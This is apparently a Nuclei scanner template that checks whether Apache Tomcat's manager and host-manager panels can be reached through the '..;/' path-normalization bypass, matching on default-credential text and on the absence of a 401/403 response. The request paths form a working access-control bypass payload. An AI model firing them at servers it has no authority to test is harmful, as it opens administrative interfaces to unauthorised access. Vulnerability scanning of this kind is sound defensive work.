id: tomcat-manager-pathnormalization

info:
  name: Tomcat Manager Path Normalization
  author: organiccrap
  severity: info
  reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  tags: panel,tomcat,apache

requests:
  - method: GET
    path:
      - '{{BaseURL}}/..;/manager/html'
      - '{{BaseURL}}/..;/host-manager/html'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'username="tomcat" password="s3cret"'
          - 'manager-gui'
        condition: and

      - type: status
        negative: true
        status:
          - 403
          - 401
